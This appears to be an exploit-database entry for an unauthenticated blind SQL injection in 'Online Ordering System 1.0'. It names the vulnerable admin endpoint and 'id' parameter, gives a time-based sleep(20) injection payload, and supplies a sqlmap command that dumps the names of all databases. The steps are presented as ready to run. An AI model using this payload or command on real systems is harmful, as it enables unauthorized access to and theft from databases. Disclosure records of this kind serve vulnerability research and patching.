Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)

ID: 104097
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 2021-03-04
# Exploit Author: Suraj Bhosale
# Vendor Homepage:
# Software Link:
# Version: v1.0
# Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9
# Vulnerable Parameter: id

*Steps to Reproduce:*
1) Visit
http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response.
2) Now fire up the following command into SQLMAP.

CMD: sqlmap -u  http://localhost/onlineordering/GPST/admin/design.php?id=9
--batch --dbs

3) Using the above command we will get the name of all the database.
1-4-2 (www01)